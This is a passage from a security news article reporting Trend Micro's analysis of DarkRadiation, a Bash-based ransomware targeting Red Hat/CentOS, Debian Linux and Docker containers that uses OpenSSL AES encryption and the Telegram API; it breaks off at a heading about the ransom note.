The newly discovered DarkRadiation ransomware chain is unlike any other ransomware family.
Trend Micro cybersecurity researchers have shared findings of a newly identified ransomware strain dubbed DarkRadiation. The ransomware strain is entirely written in Bash, and this aspect makes it difficult for most security software to detect it as a threat.
SEE: Revil ransomware gang hits US nuclear weapons contractor
Its primary targets are Linux and Docker Cloud containers, which is particularly concerning for enterprises. Moreover, it relies on Telegram to initiate communication with its C&C server.
“The ransomware … targets Red Hat/CentOS and Debian Linux distributions. The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s),” researchers noted in their report.
About DarkRadiation Ransomware
The ransomware was first detected by Twitter user @r3dbU7z on 28 May. Later, it was analyzed by Trend Micro researchers. It is reported that the ransomware was discovered as part of a range of hacker tools through VirusTotal. The tools were hosted on the threat actor’s infrastructure in a directory titled “api_attack.”
Currently, there’s no information on the ransomware’s delivery methods or its in-the-wild attack evidence. But, when its different components were assessed, researchers noted that the developers want to use it to target Linux installs and Docker containers.
DarkRadiation ransomware’s ransom note
